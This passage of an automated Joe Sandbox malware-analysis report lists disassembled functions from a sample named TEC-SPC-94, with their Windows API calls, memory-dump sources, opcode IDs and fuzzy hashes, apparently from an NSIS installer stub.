                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0,00434000), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3751793516-0
                                                          • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                          • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                          Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          Function 00405BE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9